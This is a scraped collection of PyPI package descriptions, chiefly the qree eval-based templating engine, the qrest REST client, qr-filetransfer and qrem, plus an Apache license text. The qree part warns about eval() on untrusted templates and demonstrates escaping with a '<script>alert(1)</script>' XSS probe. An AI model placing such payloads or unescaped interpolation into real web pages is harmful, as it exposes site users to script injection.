PySide)redis-pyUsage$qrediswithnoDBloadedonstartup$qredis$connecttolocalhost:6379,db=0$qredis-p6379$connectwithunixsocket,db=5$qredis-s/tmp/redis.sock-n5AlternativesRESP.app (Formerly RedisDesktopManager)dbgateRedisInsightredis-commanderAn updated list can be foundhereThat's all folks!"} +{"package": "qree", "pacakge-description": "QreeQree (read 'Curie') is a tiny but mighty Python templating engine, geared toward HTML. 'Qree' is short for:Quote,replace,exec(),eval().The entire module is under 200 lines. Instead of using regular expressions or PEGs, Qree relies on Python'sexec()andeval(). Thus, it supportsall language features, out of the box. For more on Qree's internals, please see:Build Your Own Python Template Engine!!! Warning:DoNOTrender untrusted templates. As Qree useseval(), rendering untrusted templates is equivalent to giving untrusted entities access to your entire systems.Installationpip install qreeAlternatively, just downloadqree.pyinto your project directory.Text InterpolationUse{{: expression :}}for HTML-escaped interpolation, or{{= expression =}}for interpolationwithoutescaping. The latter issusceptible to XSS, so please be careful. Here are a few quick examples:1. Hello, World!:qree.renderStr(\"

Hello, {{: data :}}\",data=\"World!\")# Output: Hello, World!
2. Using Expressions:qree.renderStr(\"

Mr. {{: data.title() + '!' :}}\",data=\"bond\")# Output: Mr. Bond!
3. HTML Escaping:qree.renderStr(\"Mr. {{: data :}}\",data=\"<b> Villain </b>\")# Output: Mr. <b> Villain </b>4. Without Escaping:qree.renderStr(\"Mr. {{= data =}}\",data=\"<b> Villain </b>\")# Output: Mr. Villain 5. Longer Example:qree.renderStr(\"\"\"{{: data[\"title\"].title() :}}

{{: data[\"title\"].title() :}}

{{: data[\"body\"] :}}
\"\"\",data={\"title\":\"Lorem Ipsum\",\"body\":\"Lorem ipsum dolor sit amet, ... elit.\",})# Output:Lorem Ipsum

Lorem Ipsum

Lorem ipsum dolor sit amet, ... elit.
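Before moving on, the escaping rule from examples 3 and 4 deserves a self-contained restatement, since it is the main safety point behind the warning above. The snippet below is only an illustration: the payload string and the expected outputs in the comments are assumptions based on what HTML-escaping means, not taken verbatim from the Qree docs.

```python
import qree

payload = '<script>alert(1)</script>'  # illustrative untrusted input

# {{: ... :}} HTML-escapes the value, so the markup is rendered harmless.
print(qree.renderStr('<p>{{: data :}}</p>', data=payload))
# Expected output (escaped): <p>&lt;script&gt;alert(1)&lt;/script&gt;</p>

# {{= ... =}} interpolates verbatim -- only use it with trusted values.
print(qree.renderStr('<p>{{= data =}}</p>', data=payload))
# Expected output (raw, XSS risk): <p><script>alert(1)</script></p>
```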
Python CodeAny line beginning with@=is treated as Python code. (Preceding whitespace is ignored.) You can writeany codeyou wish, as Qree supports all language features. You can define variables, import modules, make assertions etc. For example:Leap Year Detection (withlambda):tplStr=\"\"\"@= isLeap = lambda n: (n % 400 == 0) or (n % 100 != 0 and n % 4 == 0)@= isOrIsNot = \"IS\" if isLeap(data['year']) else \"is NOT\"The year {{: data['year'] :}} {{: isOrIsNot :}} a leap year.\"\"\"qree.renderStr(tplStr,data={\"year\":2000})# Output: The year 2000 IS a leap year.qree.renderStr(tplStr,data={\"year\":2001})# Output: The year 2001 is NOT a leap year.Python IndentationPython is an indented language. Use the special tags@{and@}for respectively indicating indentation and de-indentation to Qree. When used, such a tagshould appear by itself on a separate line, ignoring whitespace and trailing Python comments. For example:Leap Year Detection (withdef):tplStr=\"\"\"@= def isLeap (n):@{@= if n % 400 == 0: return True;@= if n % 100 == 0: return False;@= return n % 4 == 0;@}@= isOrIsNot = \"IS\" if isLeap(data['year']) else \"is NOT\"The year {{: data['year'] :}} {{: isOrIsNot :}} a leap year.\"\"\"qree.renderStr(tplStr,data={\"year\":2000})# Output: The year 2000 IS a leap year.qree.renderStr(tplStr,data={\"year\":2001})# Output: The year 2001 is NOT a leap year.FizzBuzz ExampleFizzBuzz is a popular programming assignment. The idea is to print consecutive numbers per line, but instead to print'Fizz'for multiples of 3,'Buzz'for multiples of 5, and'FizzBuzz'for multiples of 3 and 5.qree.renderStr(\"\"\"@= for n in range(1, data+1):@{@= if n % 15 == 0:@{FizzBuzz@}@= elif n % 3 == 0:@{Fizz@}@= elif n % 5 == 0:@{Buzz@}@= else:@{{{: n :}}@}@}\"\"\",data=20)# Output:1\n 2\n Fizz\n 4\n Buzz\n Fizz\n 7\n 8\n Fizz\n Buzz\n 11\n Fizz\n 13\n 14\n FizzBuzz\n 16\n 17\n Fizz\n 19\n BuzzThedataVariableBy default, data passed via thedataparameter is available in the template as thedatavariable. However, if you'd like to change the variable name, you may do so via thevariableparameter. For example:qree.renderStr(\"Hi {{: name :}}!\",data=\"Jim\",variable=\"name\")# Output: Hi Jim!Template FilesIt's always convenient to store templates using separate files. To work with files, useqree.renderPath(tplPath, data, ...)instead ofqree.renderStr(tplStr, data, ...).Let's say you have the following directory structure:- app.py\n- qree.py\n- views/\n - homepage.htmlHere'shomepage.html:{{: data['title'] :}}

{{: data['title'] :}} {{: data['body'] :}}
Inapp.py, you could have the following snippet:defserve_homepage():returnqree.renderPath(\"./views/homepage.html\",data={\"title\":\"The TITLE Goes Here!\",\"body\":\"And the body goes here ...\",});Which would be equivalent to:defserve_homepage():withopen(\"./views/homepage.html\",\"r\")asf:returnqree.renderStr(f.read(),data={\"title\":\"The TITLE Goes Here!\",\"body\":\"And the body goes here ...\",});In either case, the output would be:The TITLE Goes Here!

The TITLE Goes Here! And the body goes here ...
Quick PlugQree is built and maintained by the folks atPolydojo, Inc., led bySumukh Barve. If your team is looking for a simple project management tool, please check out our latest product:BoardBell.com.Template NestingSince templates can include any Python code, you can callqree.renderPath()from within a template! Consider the following directory structure:- app.py\n- qree.py\n- views/\n - header.html\n - homepage.html\n - footer.htmlWithheader.html:Link 1Link 2Link 3And similarly,footer.html:Link ALink BLink CNow, you can useheader.htmlandfooter.htmlinhomepage.html:@= import qree;\n{{: data['title'] :}}{{= qree.renderPath(\"./test-views/header.html\", data=None) =}}

{{: data['title'] :}} {{: data['body'] :}}
{{= qree.renderPath(\"./test-views/footer.html\", data=None) =}}And, as before, the snippet inapp.py:defserve_homepage():returnqree.renderPath(\"./views/homepage.html\",data={\"title\":\"The TITLE Goes Here!\",\"body\":\"And the body goes here ...\",});The output is:... TITLE 2 ...Link 1Link 2Link 3

... TITLE 2 ... ... BODY 2 ...
Link ALink BLink CIn the above example, we explicitly passeddata=Noneto each nested template. We could've passed any value. We could've even ignored thedataparameter, as it defaults toNoneanyway.Custom Tags (viatagMap)Default tags like{{:,:}},@=, etc. can each be customized via thetagMapparameter. UsingtagMap, just supply your desired tag as the value against the default tag as key. A few examples follow:1.[[:Square:]]Brackets Instead Of{{:Braces:}}qree.renderStr(tplStr=\"Hello, [[: data.title().rstrip('!') + '!' :]]\",data=\"world\",tagMap={\"{{:\":\"[[:\",\":}}\":\":]]\",\"{{=\":\"[[=\",# <-- Not directly used in this example.\"=}}\":\"=]]\",# <---^})# Output: Hello, World!2. Percentage Sign For Code Blocks (%vs@)tplStr=\"\"\"%= isLeap = lambda n: (n % 400 == 0) or (n % 100 != 0 and n % 4 == 0)%= isOrIsNot = \"IS\" if isLeap(data['year']) else \"is NOT\"The year {{: data['year'] :}} {{: isOrIsNot :}} a leap year.\"\"\"qree.renderStr(tplStr,data={\"year\":2020},tagMap={\"@=\":\"%=\",\"@{\":\"%{\",# <-- Not directly used in this example.\"@}\":\"%}\",# <--^})# Output: The year 2020 IS a leap year.DefaulttagMap:The default values for each of the tags is as specified in the dict below.{\"@=\":\"@=\",\"@{\":\"@{\",\"@}\":\"@}\",\"{{=\":\"{{=\",\"=}}\":\"=}}\",\"{{:\":\"{{:\",\":}}\":\":}}\",}View DecoratorIf you're working withFlask,Bottleor a similar WSGI framework,qree.viewcan help bind route to templates.@app.route(\"/user-list\")@qree.view(\"./views/user-list.html\",variable=\"userList\")defserve_userList():userList=yourLogicHere();returnuserList;The above is identical to the following:@app.route(\"/user-list\")defserve_user_list_page():userList=yourLogicHere();returnqree.renderPath(\"./views/user-list.html\",data=userList,variable=\"userList\",);Vilo:UsingViloinstead of Flask/Bottle? Great choice! Qree jives with Vilo:@app.route(\"GET\",\"/user-list\")@qree.view(\"./views/user-list.html\",variable=\"userList\")defserve_userList(req,res):userList=yourLogicHere(req);returnuserList;Custom Tags:Like withqree.renderPath(.)andqree.renderStr(.), you can use custom tags withqree.view(.)by passingtagMap.Testing & ContributingInstall pytest viapip install -U pytest. Run tests with:pytestIf you encounter a bug, please open an issue on GitHub; but if you find a security vulnerability, please emailsecurity@polydojo.cominstead.If you'd like to see a new feature or contribute code, please open a GitHub issue. We'd love to hear from you! Suggestions and code contributions will always be appreciated, big and small.LicensingCopyright (c) 2020 Polydojo, Inc.Software Licensing:The software is released \"AS IS\" under theMIT license, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED. Kindly seeLICENSE.txtfor more details.No Trademark Rights:The above software licensing termsdo notgrant any right in the trademarks, service marks, brand names or logos of Polydojo, Inc."} +{"package": "qreg", "pacakge-description": "UNKNOWN"} +{"package": "qregpy", "pacakge-description": "TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION1. Definitions.\"License\" shall mean the terms and conditions for use, reproduction,and distribution as defined by Sections 1 through 9 of this document.\"Licensor\" shall mean the copyright owner or entity authorized bythe copyright owner that is granting the License.\"Legal Entity\" shall mean the union of the acting entity and allother entities that control, are controlled by, or are under commoncontrol with that entity. 
For the purposes of this definition,\"control\" means (i) the power, direct or indirect, to cause thedirection or management of such entity, whether by contract orotherwise, or (ii) ownership of fifty percent (50%) or more of theoutstanding shares, or (iii) beneficial ownership of such entity.\"You\" (or \"Your\") shall mean an individual or Legal Entityexercising permissions granted by this License.\"Source\" form shall mean the preferred form for making modifications,including but not limited to software source code, documentationsource, and configuration files.\"Object\" form shall mean any form resulting from mechanicaltransformation or translation of a Source form, including butnot limited to compiled object code, generated documentation,and conversions to other media types.\"Work\" shall mean the work of authorship, whether in Source orObject form, made available under the License, as indicated by acopyright notice that is included in or attached to the work(an example is provided in the Appendix below).\"Derivative Works\" shall mean any work, whether in Source or Objectform, that is based on (or derived from) the Work and for which theeditorial revisions, annotations, elaborations, or other modificationsrepresent, as a whole, an original work of authorship. For the purposesof this License, Derivative Works shall not include works that remainseparable from, or merely link (or bind by name) to the interfaces of,the Work and Derivative Works thereof.\"Contribution\" shall mean any work of authorship, includingthe original version of the Work and any modifications or additionsto that Work or Derivative Works thereof, that is intentionallysubmitted to Licensor for inclusion in the Work by the copyright owneror by an individual or Legal Entity authorized to submit on behalf ofthe copyright owner. For the purposes of this definition, \"submitted\"means any form of electronic, verbal, or written communication sentto the Licensor or its representatives, including but not limited tocommunication on electronic mailing lists, source code control systems,and issue tracking systems that are managed by, or on behalf of, theLicensor for the purpose of discussing and improving the Work, butexcluding communication that is conspicuously marked or otherwisedesignated in writing by the copyright owner as \"Not a Contribution.\"\"Contributor\" shall mean Licensor and any individual or Legal Entityon behalf of whom a Contribution has been received by Licensor andsubsequently incorporated within the Work.2. Grant of Copyright License. Subject to the terms and conditions ofthis License, each Contributor hereby grants to You a perpetual,worldwide, non-exclusive, no-charge, royalty-free, irrevocablecopyright license to reproduce, prepare Derivative Works of,publicly display, publicly perform, sublicense, and distribute theWork and such Derivative Works in Source or Object form.3. Grant of Patent License. Subject to the terms and conditions ofthis License, each Contributor hereby grants to You a perpetual,worldwide, non-exclusive, no-charge, royalty-free, irrevocable(except as stated in this section) patent license to make, have made,use, offer to sell, sell, import, and otherwise transfer the Work,where such license applies only to those patent claims licensableby such Contributor that are necessarily infringed by theirContribution(s) alone or by combination of their Contribution(s)with the Work to which such Contribution(s) was submitted. 
If Youinstitute patent litigation against any entity (including across-claim or counterclaim in a lawsuit) alleging that the Workor a Contribution incorporated within the Work constitutes director contributory patent infringement, then any patent licensesgranted to You under this License for that Work shall terminateas of the date such litigation is filed.4. Redistribution. You may reproduce and distribute copies of theWork or Derivative Works thereof in any medium, with or withoutmodifications, and in Source or Object form, provided that Youmeet the following conditions:(a) You must give any other recipients of the Work orDerivative Works a copy of this License; and(b) You must cause any modified files to carry prominent noticesstating that You changed the files; and(c) You must retain, in the Source form of any Derivative Worksthat You distribute, all copyright, patent, trademark, andattribution notices from the Source form of the Work,excluding those notices that do not pertain to any part ofthe Derivative Works; and(d) If the Work includes a \"NOTICE\" text file as part of itsdistribution, then any Derivative Works that You distribute mustinclude a readable copy of the attribution notices containedwithin such NOTICE file, excluding those notices that do notpertain to any part of the Derivative Works, in at least oneof the following places: within a NOTICE text file distributedas part of the Derivative Works; within the Source form ordocumentation, if provided along with the Derivative Works; or,within a display generated by the Derivative Works, if andwherever such third-party notices normally appear. The contentsof the NOTICE file are for informational purposes only anddo not modify the License. You may add Your own attributionnotices within Derivative Works that You distribute, alongsideor as an addendum to the NOTICE text from the Work, providedthat such additional attribution notices cannot be construedas modifying the License.You may add Your own copyright statement to Your modifications andmay provide additional or different license terms and conditionsfor use, reproduction, or distribution of Your modifications, orfor any such Derivative Works as a whole, provided Your use,reproduction, and distribution of the Work otherwise complies withthe conditions stated in this License.5. Submission of Contributions. Unless You explicitly state otherwise,any Contribution intentionally submitted for inclusion in the Workby You to the Licensor shall be under the terms and conditions ofthis License, without any additional terms or conditions.Notwithstanding the above, nothing herein shall supersede or modifythe terms of any separate license agreement you may have executedwith Licensor regarding such Contributions.6. Trademarks. This License does not grant permission to use the tradenames, trademarks, service marks, or product names of the Licensor,except as required for reasonable and customary use in describing theorigin of the Work and reproducing the content of the NOTICE file.7. Disclaimer of Warranty. Unless required by applicable law oragreed to in writing, Licensor provides the Work (and eachContributor provides its Contributions) on an \"AS IS\" BASIS,WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express orimplied, including, without limitation, any warranties or conditionsof TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR APARTICULAR PURPOSE. 
You are solely responsible for determining theappropriateness of using or redistributing the Work and assume anyrisks associated with Your exercise of permissions under this License.8. Limitation of Liability. In no event and under no legal theory,whether in tort (including negligence), contract, or otherwise,unless required by applicable law (such as deliberate and grosslynegligent acts) or agreed to in writing, shall any Contributor beliable to You for damages, including any direct, indirect, special,incidental, or consequential damages of any character arising as aresult of this License or out of the use or inability to use theWork (including but not limited to damages for loss of goodwill,work stoppage, computer failure or malfunction, or any and allother commercial damages or losses), even if such Contributorhas been advised of the possibility of such damages.9. Accepting Warranty or Additional Liability. While redistributingthe Work or Derivative Works thereof, You may choose to offer,and charge a fee for, acceptance of support, warranty, indemnity,or other liability obligations and/or rights consistent with thisLicense. However, in accepting such obligations, You may act onlyon Your own behalf and on Your sole responsibility, not on behalfof any other Contributor, and only if You agree to indemnify,defend, and hold each Contributor harmless for any liabilityincurred by, or claims asserted against, such Contributor by reasonof your accepting any such warranty or additional liability.END OF TERMS AND CONDITIONSAPPENDIX: How to apply the Apache License to your work.To apply the Apache License to your work, attach the followingboilerplate notice, with the fields enclosed by brackets \"[]\"replaced with your own identifying information. (Don't includethe brackets!) The text should be enclosed in the appropriatecomment syntax for the file format. We also recommend that afile or class name and description of purpose be included on thesame \"printed page\" as the copyright notice for easieridentification within third-party archives.Copyright [2019] [Qingzhi Ma]Licensed under the Apache License, Version 2.0 (the \"License\");you may not use this file except in compliance with the License.You may obtain a copy of the License athttp://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, softwaredistributed under the License is distributed on an \"AS IS\" BASIS,WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.See the License for the specific language governing permissions andlimitations under the License.Description:This project implements the Query-Centric Regression, named QReg.QReg is a ensemble methods based on various base regression models.Current QReg support linear, polynomial, decision tree, xgboost, gboosting regression as its base models.DependenciesPython 3.6 or higher, requires scipy, xgboost, numpy, scikit-learnKeywords: Query-centric RegressionPlatform: UNKNOWNClassifier: Development Status :: 1.1Classifier: License :: OSI Approved :: MIT LicenseClassifier: Programming Language :: Python :: 3.6Classifier: Topic :: Approximate Query Processing :: Regression :: ensemble method"} +{"package": "qrem", "pacakge-description": "QREM - Quantum Readout Errors MitigationThis package provides a versatile set of tools for the characterization and mitigation of readout noise in NISQ devices. 
Standard characterization approaches become infeasible with the growing size of a device, since the number of circuits required to perform tomographic reconstruction of a measurement process grows exponentially in the number of qubits. In QREM we use efficient techniques that circumvent those problems by focusing on reconstructing local properties of the readout noise.You can find article based on initial version of this packagehere - http://arxiv.org/abs/2311.10661and the corresponding code used at the moment of writning the articlehere.Status of developmentThis package is released now as an alpha version, to gather feedback while it undergoes final adjustments prior to the first release. As it is under heavy development, existing functionalities might change, while new functionalities and notebooks are expected to be added in the future.DocumentationCurrent documentation (work in progress) is availablehereIntroductionThe two current main functionalities are:Noise characterizationexperiment designhardware experiment implementation and data processing (on devices supported by qiskit/pyquil)readout noise characterisationlearning of noise modelsNoise mitigationmitigation based on noise model provided by user ( currently available is CN, CTMP is under development)InstallationThe best way to install this package is to use pip (seepypi website):pip install qremThis method will automatically install all required dependecies (seebelow for list of dependecies).DependenciesForqrempackage to work properly, the following libraries should be present (and will install if you install via pip):\"numpy >= 1.18.0, < 1.24\",\"scipy >= 1.7.0\",\"tqdm >= 4.46.0\",\"colorama >= 0.4.3\",\"qiskit >= 0.39.4\",\"networkx >= 0.12.0, < 3.0\",\"pandas >= 1.5.0\",\"picos >= 2.4.0\",\"qiskit-braket-provider >= 0.0.3\",\"qutip >= 4.7.1\",\"matplotlib >= 3.6.0\",\"seaborn >= 0.12.0\",\"sympy >= 1.11.0\",\"pyquil >= 3.0.0\",\"pyquil-for-azure-quantum\",\"ipykernel >= 6.1.0\",\"configargparse >= 1.5.0\",\"python-dotenv >= 1.0.0\",Optional dependenciesDependecies for visualizations:\"manim >= 0.17.2\"ReferencesThe workflow of this package is mainly based on works:[1] Filip B. Maciejewski, Zolt\u00e1n Zimbor\u00e1s, Micha\u0142 Oszmaniec, \"Mitigation of readout noise in near-term quantum devices by classical post-processing based on detector tomography\",Quantum 4, 257 (2020)[2] Filip B. Maciejewski, Flavio Baccari, Zolt\u00e1n Zimbor\u00e1s, Micha\u0142 Oszmaniec, \"Modeling and mitigation of cross-talk effects in readout noise with applications to the Quantum Approximate Optimization Algorithm\",Quantum 5, 464 (2021)Further references:[3]. Sergey Bravyi, Sarah Sheldon, Abhinav Kandala, David C. Mckay, Jay M. Gambetta, Mitigating measurement errors in multi-qubit experiments,Phys. Rev. A 103, 042605 (2021)[4]. Flavio Baccari, Christian Gogolin, Peter Wittek, and Antonio Ac\u00edn, Verifying the output of quantum optimizers with ground-state energy lower bounds,Phys. Rev. 
Research 2, 043163 (2020)"} +{"package": "qrencode", "pacakge-description": "A simple wrapper for the C qrencode library."} +{"package": "qrencode-ascii", "pacakge-description": "# pyqrencode\nPython wrapper for C qrencode library.### Usage`bash $ python3-c'import qrencode_ascii;print(qrencode_ascii.encode(\\'HelloWorld\\'))'\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588 \u2580 \u2584\u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588 \u2588\u2588 \u2588 \u2588 \u2588\u2584 \u2588 \u2584\u2588 \u2588 \u2588 \u2588\u2588 \u2588\u2588\u2588\u2584\u2584\u2584\u2588\u2588\u2588\u2588\u2584\u2588\u2588\u2588\u2584\u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2588\u2580\u2584\u2580\u2588\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2588\u2588\u2588\u2588\u2584 \u2588 \u2584\u2584 \u2584\u2588\u2584\u2580\u2580\u2588\u2584\u2580\u2580\u2588\u2588\u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2584\u2588\u2580\u2588\u2584\u2584\u2588\u2584\u2584\u2584 \u2584\u2588\u2588\u2588\u2588\u2584\u2584\u2588\u2588\u2584\u2588\u2584\u2584\u2580\u2584\u2580\u2580\u2584\u2588\u2584\u2584\u2588\u2580\u2580\u2588\u2588\u2588\u2588\u2588\u2584\u2584\u2584\u2584\u2584\u2588 \u2580\u2584 \u2580\u2588\u2588\u2584\u2588\u2584\u2584\u2588\u2588 \u2588\u2588 \u2588 \u2588\u2588\u2584\u2580\u2580\u2588\u2588\u2580\u2580\u2588\u2580\u2580\u2588\u2588\u2588\u2588\u2588\u2588\u2584\u2584\u2584\u2588\u2588\u2588\u2584\u2580\u2584\u2588\u2584\u2588\u2588\u2584\u2580\u2584\u2588\u2588\u2588\u2588\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2588\u2584\u2588\u2584\u2584\u2584\u2588\u2588\u2584\u2588\u2588\u2588\u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588`"} +{"package": "qrep", "pacakge-description": "No description available on PyPI."} +{"package": "qreport", "pacakge-description": "No description available on PyPI."} +{"package": "qrequest", "pacakge-description": "qrequest========Instantly create an API and web interface for SQL queries.# Basic Setup1. Write SQL queries to collect the data users can access. Use :keywords for parameters.2. Run `python qrequest.py setup` to get an sql folder to put your queries and default settings file2. Put these queries in the sql/main directory3. Modify the settings below to specify the database driver (name of the python module) and databsae connection string4. Then run `python qrequest.py run` to get a website which lets users run any of your queries without installing a thing, as well as an API endpoint.The settings file looks like this. 
You can change the website title, description and the port the site runs on```{\"sites\": {\"main\": {\"db_connection_string\": \"\",\"db_driver\": \"\"}},\"website_description\": \"Run some queries\",\"website_port_number\": 5000,\"website_title\": \"qRequest\"}```Users can view queries through the web interface, and download the json or csv formatted query results.The URL format for the json endpoint is```/api/{site_name}/{query_name}.json?{params}```The URL format for the CSV endpoint is```/api/{site_name}/{query_name}.csv?{params}```As an example, if you have a query called example_query.sql with two parameters (param1 and param2),to run the query with param1=1234 and param2=\"string\", go to```/api/main/example_query.sql.csv?param1=1234¶m2=string```# Multiple Sitesqrequest supports multiple database connections, which are called sites.To setup qrequest for multiple sites, pass all the site names as arguments to the`setup` command. If none are passed, one site called `main` is created by default.As an example, to setup two sites called `site1` and `site2` run```python qrequest.py setup site1 site2```This will generate the following settings file```{\"sites\": {\"site1\": {\"db_connection_string\": \"\",\"db_driver\": \"\"},\"site2\": {\"db_connection_string\": \"\",\"db_driver\": \"\"}},\"website_description\": \"Run some queries\",\"website_port_number\": 5000,\"website_title\": \"qRequest\"}```You can specify different connection strings and database drivers for each site."} +{"package": "qreservoir", "pacakge-description": "QreservoirQreservoir is a lightweight python package built on top of qulacs to simulate quantum extreme learning and quantum reservoir computing models.Qreservoir is licensed under theMIT license.Tutorial and API documentsDocumentation and API:https://owenagnel.github.io/qreservoir.Quick Install for Pythonpip install qreservoirUninstall Qreservoir:pip uninstall qreservoirFeaturesFast simulation of quantum extreme learning machine and quantum reservoir computing.Python sample codefromqulacsimportObservablefromsklearn.linear_modelimportLinearRegressionfromqreservoir.datasetsimportComplex_Fourrierfromqreservoir.encodersimportExpEncoderfromqreservoir.modelsimportQELModelfromqreservoir.reservoirsimportRotationReservoirdataset=Complex_Fourrier(complexity=1,size=1000,noise=0.0)encoder=ExpEncoder(1,1,3)# 1 feature, 1 layer, 1 qubit per featurereservoir=RotationReservoir(encoder,0,10)# 0 ancilla qubits, 10 depthobservables=[Observable(3)for_inrange(9)]# create observable setfori,obinenumerate(observables[:3]):ob.add_operator(1.0,f\"X{i}\")fori,obinenumerate(observables[3:6]):ob.add_operator(1.0,f\"Z{i}\")fori,obinenumerate(observables[6:]):ob.add_operator(1.0,f\"Y{i}\")model=QELModel(reservoir,observables,LinearRegression())# observable is a qulacs Observable objectX,_,y,_=dataset.get_train_test()model.fit(X,y)print(model.score(X,y))How to citeN/AFuture improvementsModel creation currently a bit clunky. Models should take encoders and reservoirs as two seperate arguments and size of inputs should be determined dynamically when fit/score are called. This is made more difficult by the fact we wish to extract variance and concentration data from the models. 
Ideally we wantRCModelandQELModelto implement scikit-learn'sBaseEstimatorinterface.Additional tests should be written for datasets and new reservoirs/encodersImprove package structure by using python specific object oriented features."} +{"package": "qresp", "pacakge-description": "No description available on PyPI."} +{"package": "qresp-config", "pacakge-description": "No description available on PyPI."} +{"package": "qrest", "pacakge-description": "qrest is a Python package that allows you to easily build a Python client to\naccess a REST API. To show how it works, we use it to access the REST API of theJSONPlaceholder website, which provides dummy data for testing and\nprototyping purposes.The following Python snippet sends a HTTP GET request to retrieve all \u201cposts\u201d,\nwhich is one of the resources of the website:import pprint\nimport requests\n\nresponse = requests.request(\"GET\", \"https://jsonplaceholder.typicode.com/posts\")\npprint.pprint(response.json()[0:2])This snippet outputs:[{'body': 'quia et suscipit\\n'\n 'suscipit recusandae consequuntur expedita et cum\\n'\n 'reprehenderit molestiae ut ut quas totam\\n'\n 'nostrum rerum est autem sunt rem eveniet architecto',\n 'id': 1,\n 'title': 'sunt aut facere repellat provident occaecati excepturi optio '\n 'reprehenderit',\n 'userId': 1},\n{'body': 'est rerum tempore vitae\\n'\n 'sequi sint nihil reprehenderit dolor beatae ea dolores neque\\n'\n 'fugiat blanditiis voluptate porro vel nihil molestiae ut '\n 'reiciendis\\n'\n 'qui aperiam non debitis possimus qui neque nisi nulla',\n 'id': 2,\n 'title': 'qui est esse',\n 'userId': 1}]The snippet uses the Pythonrequestslibrary to send the request. This library\nmakes it very easy to query a REST API, but it requires the user to know the\nstructure of the REST API, how to build calls to that API, how to parse\nresponses etc. This is where qrest comes in: it allows you toconfigurea\nPython API that provides access to theinformationand hides the nitty-gritty\ndetails of writing REST API code. For example, using qrest the code to retrieve\nthe posts looks like this:import qrest\nimport jsonplaceholderconfig\n\napi = qrest.API(jsonplaceholderconfig)\n\nposts = api.all_posts()If you want to retrieve the posts from a specific author:import pprint\n\n# all authors are numbered from 1 to 10\nposts = api.filter_posts(user_id=7)\n\n# only output the title of each post for brevity\ntitles = [post[\"title\"] for post in posts]\npprint.pprint(titles)which outputs:['voluptatem doloribus consectetur est ut ducimus',\n 'beatae enim quia vel',\n 'voluptas blanditiis repellendus animi ducimus error sapiente et suscipit',\n 'et fugit quas eum in in aperiam quod',\n 'consequatur id enim sunt et et',\n 'repudiandae ea animi iusto',\n 'aliquid eos sed fuga est maxime repellendus',\n 'odio quis facere architecto reiciendis optio',\n 'fugiat quod pariatur odit minima',\n 'voluptatem laborum magni']The one thing you have to do is configure this API. 
The modulejsonplaceholderconfigin the example above is configured like this:from qrest import APIConfig, ResourceConfig, QueryParameter\n\n\nclass JSONPlaceholderConfig(APIConfig):\n url = \"https://jsonplaceholder.typicode.com\"\n\n\nclass AllPosts(ResourceConfig):\n\n name = \"all_posts\"\n path = [\"posts\"]\n method = \"GET\"\n description = \"retrieve all posts\"\n\n\nclass FilterPosts(ResourceConfig):\n\n name = \"filter_posts\"\n path = [\"posts\"]\n method = \"GET\"\n description = \"retrieve all posts with a given title\"\n\n user_id = QueryParameter(name=\"userId\", description=\"the user ID of the author of the post\")For more information about qrest and its usage, we refer to the documentation.If you want to contribute to qrest itself, we refer to the developer README that\nis located in the root directory of the repo."} +{"package": "qreu", "pacakge-description": "EMail Wrapper"} +{"package": "qr-fileautomator", "pacakge-description": "File OrganizerOrganizes your files in the folder according to their extension by grouping them together.Libraries UsedUsageJust run the commandpython3 fileorganizerpyfrom your terminal/bash."} +{"package": "qr-filetransfer", "pacakge-description": "\u2728Transfer files over WiFi between your computer and your smartphone from the terminal\u2728InstallationYou will find the most updated version ofqr-filetransferhere. But if you want the most stable version, usepipto install itPip InstallGlobal Installpip3 install qr-filetransfer[extras]Local Installpip3 install --user qr-filetransfer[extras]If you run into problems during the install, try removing the optional[extras]at the end of the command.Git Install# clone the repo$gitclonehttps://github.com/sdushantha/qr-filetransfer.git# change the working directory to qr-filetransfer$cdqr-filetransfer# install the requirements$pip3install-rrequirements.txtUsageusage: qr-filetransfer [-h] [--debug] [--receive] [--port PORT]\n [--ip_addr {192.168.0.105}] [--auth AUTH]\n file_path\n\nTransfer files over WiFi between your computer and your smartphone from the\nterminal\n\npositional arguments:\n file_path path that you want to transfer or store the received\n file.\n\noptional arguments:\n -h, --help show this help message and exit\n --debug, -d show the encoded url.\n --receive, -r enable upload mode, received file will be stored at\n given path.\n --port PORT, -p PORT use a custom port\n --ip_addr {192.168.0.105}\n specify IP address\n --auth AUTH add authentication, format: username:passwordNote:Both devices needs to be connected to the same networkExitingTo exit the program, just pressCTRL+C.Transfer a single file$qr-filetransfer/path/to/file.txtTransfer a full directory.Note:the directory gets zipped before being transferred$qr-filetransfer/path/to/directory/Receive/upload a file from your phone to your computer$qr-filetransfer-r/path/to/receive/file/to/CreditsInspired by the Go projectqr-filetransferLicenseMIT LicenseCopyright \u00a9 2019 Siddharth DushanthaActive contributer -Yu-Chen Lin"} +{"package": "qrftp", "pacakge-description": "Failed to fetch description. 
